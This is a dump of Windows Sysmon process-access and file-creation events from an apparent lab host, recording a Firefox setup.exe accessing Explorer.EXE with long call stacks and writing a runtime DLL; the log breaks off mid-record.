10341000x800000000000000014304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-convert-l1-1-0.dll2021-01-18 13:59:52.146 10341000x800000000000000014289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\